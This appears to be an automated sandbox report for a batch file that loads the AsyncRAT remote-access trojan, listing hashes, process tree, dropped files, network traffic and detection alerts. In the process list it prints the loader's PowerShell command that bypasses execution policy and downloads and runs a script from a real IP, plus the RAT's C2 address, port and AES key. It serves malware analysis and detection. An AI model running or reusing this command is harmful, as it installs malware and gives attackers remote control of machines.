File name:

fffd68f610114d72ebfc7f33fcc168ecd50d559c3f9d01df309121ca7682cd4b.bat

Full analysis: https://app.any.run/tasks/0e6a657b-a4d9-4227-9440-13fa15d99d53
Verdict: Malicious activity
Threats:

AsyncRAT is a RAT that can monitor and remotely control infected systems. This malware was introduced on Github as a legitimate open-source remote administration software, but hackers use it for its many powerful malicious functions.

Analysis date: April 20, 2025, 05:40:28
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
loader
rat
asyncrat
remote
Indicators:
MIME: text/x-msdos-batch
File info: DOS batch file, ASCII text, with CRLF line terminators
MD5:

B7B8DFC9BBCB3DA2AE8EEA28D6837737

SHA1:

873BB08463DF4567D7E113B538747B4298B1C310

SHA256:

FFFD68F610114D72EBFC7F33FCC168ECD50D559C3F9D01DF309121CA7682CD4B

SSDEEP:

12:wb4u4Xc9YLRL8obpoHe39X4uaILxH8Fea9KUcbE99I7r6q+0YQ98XIYAHpc4b:wKXcIp8obaHe3OuaIxH8FeoKPE99Mr6i

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Bypass execution policy to execute commands

      • powershell.exe (PID: 812)
    • Downloads the requested resource (POWERSHELL)

      • powershell.exe (PID: 812)
    • Request from PowerShell which ran from CMD.EXE

      • powershell.exe (PID: 812)
    • Changes powershell execution policy (Bypass)

      • cmd.exe (PID: 2320)
    • Dynamically loads an assembly (POWERSHELL)

      • powershell.exe (PID: 812)
    • ASYNCRAT has been detected (SURICATA)

      • MSBuild.exe (PID: 7704)
    • ASYNCRAT has been detected (YARA)

      • MSBuild.exe (PID: 7704)
  • SUSPICIOUS

    • Found IP address in command line

      • powershell.exe (PID: 812)
    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 2320)
    • The process bypasses the loading of PowerShell profile settings

      • cmd.exe (PID: 2320)
    • Connects to the server without a host name

      • powershell.exe (PID: 812)
    • Possibly malicious use of IEX has been detected

      • cmd.exe (PID: 2320)
    • Probably download files using WebClient

      • cmd.exe (PID: 2320)
    • Potential Corporate Privacy Violation

      • powershell.exe (PID: 812)
    • Process requests binary or script from the Internet

      • powershell.exe (PID: 812)
    • CSC.EXE is used to compile C# code

      • csc.exe (PID: 7640)
    • Executable content was dropped or overwritten

      • csc.exe (PID: 7640)
    • Contacting a server suspected of hosting an CnC

      • MSBuild.exe (PID: 7704)
    • Connects to unusual port

      • MSBuild.exe (PID: 7704)
  • INFO

    • Disables trace logs

      • powershell.exe (PID: 812)
    • Checks proxy server information

      • powershell.exe (PID: 812)
    • Checks supported languages

      • cvtres.exe (PID: 7668)
      • MSBuild.exe (PID: 7704)
      • csc.exe (PID: 7640)
    • Reads the machine GUID from the registry

      • MSBuild.exe (PID: 7704)
      • csc.exe (PID: 7640)
    • Reads the computer name

      • MSBuild.exe (PID: 7704)
    • Reads the software policy settings

      • MSBuild.exe (PID: 7704)
      • slui.exe (PID: 7304)
    • Create files in a temporary directory

      • cvtres.exe (PID: 7668)
      • csc.exe (PID: 7640)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

AsyncRat

(PID) Process(7704) MSBuild.exe
C2 (1)185.39.17.70
Ports (1)8848
VersionLoaderPanel
Options
AutoRunfalse
Mutexhqjitjybornneksp
InstallFolder%AppData%
Certificates
Cert1MIICMDCCAZmgAwIBAgIVAJHz+ah5/J2brULSjvSUc0iQ1oaHMA0GCSqGSIb3DQEBDQUAMGQxFTATBgNVBAMMDExvYWRlciBQYW5lbDETMBEGA1UECwwKcXdxZGFuY2h1bjEcMBoGA1UECgwTRGNSYXQgQnkgcXdxZGFuY2h1bjELMAkGA1UEBwwCU0gxCzAJBgNVBAYTAkNOMB4XDTI0MDYyMzE5MDc1MFoXDTM1MDQwMjE5MDc1MFowEDEOMAwGA1UEAwwFRGNSYXQwgZ8wDQYJKoZIhvcNAQEBBQADgY0A...
Server_SignatureCVPJD93DL+2331qWjErlHyBf0bqnxvWR24DG8xoU2w8Fu23X270YtV59LTJ0N8Plv03LW3PY7akBWoRGmuVkQTXZTjcv1TQLGqEQKNF2nCgwXlAhcijHNy225rmayMaXZEEvzoQ67S1C0GVIrsA+nAluqxnqZDCYb05xbPj+Kbo=
Keys
AES481c4247d86c050707a1e70b4783bb0238af9974ab55e0f85bd5e3b01f893f00
SaltLoaderPanel
No Malware configuration.
No data.
screenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
139
Monitored processes
10
Malicious processes
3
Suspicious processes
0

Behavior graph

Click at the process to see the details
start cmd.exe no specs conhost.exe no specs powershell.exe sppextcomobj.exe no specs slui.exe csc.exe cvtres.exe no specs msbuild.exe no specs #ASYNCRAT msbuild.exe slui.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
812powershell -NoProfile -ExecutionPolicy Bypass -Command "$w=New-Object Net.WebClient;$s=$w.DownloadString('http://185.39.17.70/zgrnf/rc.mp4');Invoke-Expression $s"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
2320C:\WINDOWS\system32\cmd.exe /c ""C:\Users\admin\AppData\Local\Temp\fffd68f610114d72ebfc7f33fcc168ecd50d559c3f9d01df309121ca7682cd4b.bat" "C:\Windows\System32\cmd.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cmdext.dll
c:\windows\system32\advapi32.dll
2432C:\WINDOWS\System32\slui.exe -EmbeddingC:\Windows\System32\slui.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Activation Client
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
4776\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
7272C:\WINDOWS\system32\SppExtComObj.exe -EmbeddingC:\Windows\System32\SppExtComObj.Exesvchost.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
KMS Connection Broker
Version:
10.0.19041.3996 (WinBuild.160101.0800)
7304"C:\WINDOWS\System32\SLUI.exe" RuleId=3482d82e-ca2c-4e1f-8864-da0267b484b2;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=TimerEventC:\Windows\System32\slui.exe
SppExtComObj.Exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows Activation Client
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\msxml6.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\ondemandconnroutehelper.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\nsi.dll
c:\windows\system32\dhcpcsvc6.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\webio.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\winnsi.dll
7640"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\ogdw5tik.cmdline"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Visual C# Command Line Compiler
Exit code:
0
Version:
4.8.9037.0 built by: NET481REL1
Modules
Images
c:\windows\microsoft.net\framework64\v4.0.30319\csc.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ole32.dll
7668C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\RESCC5A.tmp" "c:\Users\admin\AppData\Local\Temp\CSC7CE448881E414673815E1E8044857E42.TMP"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.execsc.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft® Resource File To COFF Object Conversion Utility
Exit code:
0
Version:
14.32.31326.0
Modules
Images
c:\windows\microsoft.net\framework64\v4.0.30319\cvtres.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\vcruntime140_1_clr0400.dll
7696"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
MSBuild.exe
Exit code:
4294967295
Version:
4.8.9037.0 built by: NET481REL1
Modules
Images
c:\windows\microsoft.net\framework\v4.0.30319\msbuild.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
7704"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
MSBuild.exe
Version:
4.8.9037.0 built by: NET481REL1
Modules
Images
c:\windows\microsoft.net\framework\v4.0.30319\msbuild.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\mscoree.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\advapi32.dll
AsyncRat
(PID) Process(7704) MSBuild.exe
C2 (1)185.39.17.70
Ports (1)8848
VersionLoaderPanel
Options
AutoRunfalse
Mutexhqjitjybornneksp
InstallFolder%AppData%
Certificates
Cert1MIICMDCCAZmgAwIBAgIVAJHz+ah5/J2brULSjvSUc0iQ1oaHMA0GCSqGSIb3DQEBDQUAMGQxFTATBgNVBAMMDExvYWRlciBQYW5lbDETMBEGA1UECwwKcXdxZGFuY2h1bjEcMBoGA1UECgwTRGNSYXQgQnkgcXdxZGFuY2h1bjELMAkGA1UEBwwCU0gxCzAJBgNVBAYTAkNOMB4XDTI0MDYyMzE5MDc1MFoXDTM1MDQwMjE5MDc1MFowEDEOMAwGA1UEAwwFRGNSYXQwgZ8wDQYJKoZIhvcNAQEBBQADgY0A...
Server_SignatureCVPJD93DL+2331qWjErlHyBf0bqnxvWR24DG8xoU2w8Fu23X270YtV59LTJ0N8Plv03LW3PY7akBWoRGmuVkQTXZTjcv1TQLGqEQKNF2nCgwXlAhcijHNy225rmayMaXZEEvzoQ67S1C0GVIrsA+nAluqxnqZDCYb05xbPj+Kbo=
Keys
AES481c4247d86c050707a1e70b4783bb0238af9974ab55e0f85bd5e3b01f893f00
SaltLoaderPanel
Total events
8 454
Read events
8 454
Write events
0
Delete events
0

Modification events

No data
Executable files
1
Suspicious files
3
Text files
5
Unknown types
0

Dropped files

PID
Process
Filename
Type
7640csc.exeC:\Users\admin\AppData\Local\Temp\CSC7CE448881E414673815E1E8044857E42.TMPbinary
MD5:0A142FE06DA63926276A69D8C29159B2
SHA256:3861BA1C51D6B5B34D449A41C0EBEA886EB9736F12A9BBC46E4B72F211E0F8B8
812powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_0m5npzjz.pt0.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
812powershell.exeC:\Users\admin\AppData\Local\Temp\ogdw5tik.cmdlinetext
MD5:C31FE36CE6D4A3BF9D38063EE688DFE2
SHA256:61001B6A49E4B26ACDFB6C27731F829B2487CCACCEB11176E39EAC9FF923F77A
7640csc.exeC:\Users\admin\AppData\Local\Temp\ogdw5tik.dllexecutable
MD5:654AFC6C93C635186CAEE7EDEB50A0B9
SHA256:4EA68526E70E585A8E4A2E259BC0EAB12A5A4FF8ECF63589D3407F202B84D4E6
812powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:BECFA29BED54496BBE2B447D76BDB751
SHA256:F0DDCA53DFB05686CEEF6FA8D06324D8106FB8F94FA110C928529F7353115034
7640csc.exeC:\Users\admin\AppData\Local\Temp\ogdw5tik.outtext
MD5:491E833353B1F019C311BB260446F75C
SHA256:1B0B92E95E6FFE87224A6B767B620607C4EEA7869E7978C3070925AD8CD4A822
812powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_pjsaak10.vfa.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
812powershell.exeC:\Users\admin\AppData\Local\Temp\ogdw5tik.0.cstext
MD5:58B10EF6BA0DA88788F1AAC56CE7E2DB
SHA256:AE11144F426028E50E77D64A66AEB954E169F627F8ABFE403791032594834520
7668cvtres.exeC:\Users\admin\AppData\Local\Temp\RESCC5A.tmpbinary
MD5:512CB4389BF274B744EA1D9BAD6A25DF
SHA256:77A2FF8DD264CBCBCEFFF965FC3FC527B7CCD0DD0B30C7455E47EDC4D4409166
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
7
TCP/UDP connections
22
DNS requests
15
Threats
10

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
GET
200
2.16.164.72:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
812
powershell.exe
GET
200
185.39.17.70:80
http://185.39.17.70/zgrnf/rc.mp4
unknown
unknown
812
powershell.exe
GET
200
185.39.17.70:80
http://185.39.17.70/zgrnf/pixel.exe
unknown
unknown
812
powershell.exe
GET
200
185.39.17.70:80
http://185.39.17.70/zgrnf/qxm.exe
unknown
unknown
6544
svchost.exe
GET
200
2.23.77.188:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
8120
SIHClient.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
8120
SIHClient.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
2104
svchost.exe
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
2.16.164.72:80
crl.microsoft.com
Akamai International B.V.
NL
whitelisted
4
System
192.168.100.255:138
whitelisted
2112
svchost.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
812
powershell.exe
185.39.17.70:80
Joint Stock Company Tagnet
RU
unknown
3216
svchost.exe
172.211.123.248:443
client.wns.windows.com
MICROSOFT-CORP-MSN-AS-BLOCK
FR
whitelisted
6544
svchost.exe
20.190.160.131:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
6544
svchost.exe
2.23.77.188:80
ocsp.digicert.com
AKAMAI-AS
DE
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 4.231.128.59
  • 40.127.240.158
  • 20.73.194.208
whitelisted
google.com
  • 142.250.184.206
whitelisted
crl.microsoft.com
  • 2.16.164.72
  • 2.16.164.49
whitelisted
client.wns.windows.com
  • 172.211.123.248
whitelisted
login.live.com
  • 20.190.160.131
  • 20.190.160.67
  • 20.190.160.132
  • 40.126.32.76
  • 40.126.32.74
  • 20.190.160.130
  • 40.126.32.134
  • 40.126.32.138
whitelisted
ocsp.digicert.com
  • 2.23.77.188
whitelisted
slscr.update.microsoft.com
  • 4.175.87.197
whitelisted
www.microsoft.com
  • 184.30.21.171
whitelisted
fe3cr.delivery.mp.microsoft.com
  • 13.95.31.18
whitelisted
activation-v2.sls.microsoft.com
  • 20.83.72.98
whitelisted

Threats

PID
Process
Class
Message
812
powershell.exe
Potentially Bad Traffic
ET INFO Executable Download from dotted-quad Host
812
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
812
powershell.exe
Potential Corporate Privacy Violation
ET INFO PE EXE or DLL Windows file download HTTP
812
powershell.exe
Potentially Bad Traffic
ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response
812
powershell.exe
Potentially Bad Traffic
ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
812
powershell.exe
Potentially Bad Traffic
ET INFO Executable Download from dotted-quad Host
812
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
812
powershell.exe
Potentially Bad Traffic
ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response
7704
MSBuild.exe
Domain Observed Used for C2 Detected
REMOTE [ANY.RUN] AsyncRAT SSL certificate
7704
MSBuild.exe
Malware Command and Control Activity Detected
REMOTE [ANY.RUN] AsyncRAT Successful Connection
No debug info